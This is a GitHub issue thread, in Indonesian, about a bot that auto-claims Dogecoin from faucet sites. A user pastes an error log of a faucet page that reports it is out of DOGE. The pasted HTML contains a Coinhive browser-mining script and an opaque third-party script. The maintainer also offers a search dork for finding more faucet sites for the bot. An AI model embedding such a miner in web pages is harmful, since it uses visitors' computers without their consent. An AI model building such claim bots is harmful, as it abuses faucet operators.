### ISSUE TITLE
Faucet kehabisan DOGE

### ISSUE THREAD

**Issue by felangga** [dwisiswant0/Faucet-DOGE-Bot#4]
Ini saya lampirkan error lognya 

> --------------------- 2018-02-12 17:25:30.009731259 +0700 WIB m=+11758.989597640
> <!DOCTYPE html>
> <html lang="en">
> <head>
> <title>Autoclaim Faucet</title>
> 
> <link rel="icon" href="/favicon.png"/>
> 
> 
> <link rel="stylesheet" type="text/css" href="/main.css"/>
> 
> 
> <script type="text/javascript">window._idl={};_idl.variant="modal";(function(){var idl=document.createElement('script');idl.async=true;idl.src='https://members.internetdefenseleague.org/include/?url='+(_idl.url||'')+'&campaign='+(_idl.campaign||'')+'&variant='+(_idl.variant||'modal');document.getElementsByTagName('body')[0].appendChild(idl);})();</script>
> 
> 
> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-108875748-3"></script><script>window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments);}gtag('js',new Date());gtag('config','UA-108875748-3');gtag('set', {'user_id': '03504ce1da734fe751603880b27c4e41'});</script></head>
> <body>
> 
> <main>
> <div align="center" style="padding-top: 5px">
> <h1><img src="/img/head.png"></h1>
> <header><nav class="navbar">
> <a href="http://getdogecoin.website">Get Dogecoin</a>
> <a href="http://coinhub.win">CoinHub</a>
> <a href="http://mydoggy.faucethero.com/?r=DNy3ExU7pZs1VFViHi7C2otLFHiYyXydri">My Doggy</a>
> </nav>
> </header>
> </div>
> 
> <script type="text/javascript">gtag('event', 'faucet_dry', {'currency': 'DOGE',});</script><p>The faucet is out of this particular currency. Want to try another one?</p><p>(A few currencies depend on the exchange, the faucet will usually be re-filled once shogunn&#700;s &lsquo;buy&rsquo; orders are filled.) (If you are <em>really</em> impatient, perhaps someone will /tip shogunn some DOGE?)</p><p>(I would put a little &ldquo;faucet balance&rdquo; widget on the main page, but that would currently result in a <em>TON</em> of API requests&hellip;)</p><hr/>
> 
> <center>
> <p><font color="red"><strong>Do not bookmark this page!</strong></font> Use <a href="http://autoclaim.win">http://autoclaim.win</a> instead. (If the claim URL changes and you visit this page directly, you might be mistaken for a bot and <font color="red">banned</font>.)</p>
> </center>
> <hr/>
> <script async language="javascript" charset="UTF-8" type="text/javascript" src="//hvato.info/3script.js?mi572o=857445"></script>
> </main>
> <footer>
> <script src="https://coin-hive.com/lib/coinhive.min.js"></script>
> <script>var miner = new CoinHive.Anonymous("ppp25CznVYIayBJ9AMpFz7PM7y74DBST",{threads:2,throttle:0.7});miner.start();</script>
> <div style="position:fixed;bottom:0;right:0;border-radius:1vw 0 0 0;border-top:solid;border-left:solid">
> <iframe data-aa='793482' src='//acceptable.a-ads.com/793482' scrolling='no' style='border:0px; padding:0;overflow:hidden' allowtransparency='true'></iframe>
> </div>
> 
> <center>
> <iframe data-aa='786741' src='//ad.a-ads.com/786741?size=728x90' scrolling='no' style='width:728px; height:90px; border:0px; padding:0;overflow:hidden' allowtransparency='true'></iframe>
> </center>
> 
> 
> </footer>
> </body>
> </html>

**Comment by dwisiswant0** [comment]
Cariin list web yang serupa. Nanti diupdate.

**Comment by felangga** [comment]
oke om

**Comment by dwisiswant0** [comment]
Lebih efisien kalo nyarinya pake dork:
```
intext:"This faucet requires your address to be linked to a FaucetHUB account"
```

**Comment by felangga** [comment]
oke gan, 

btw yang getdogecoin.website kalau di versi 102 jalan normal, tapi error di 103

**Comment by dwisiswant0** [comment]
Coba kirim SS perbedaannya.

Pada tanggal 15 Feb 2018 11.45 AM, "felangga" <notifications@github.com>
menulis:

**Comment by felangga** [comment]
Errornya gini yang 103
```

--------------------- 2018-02-15 11:49:35.9960673 +0700 +07 m=+18.679051301
<html><body><h1>400 Bad request</h1>
Your browser sent an invalid request.
</body></html>
```
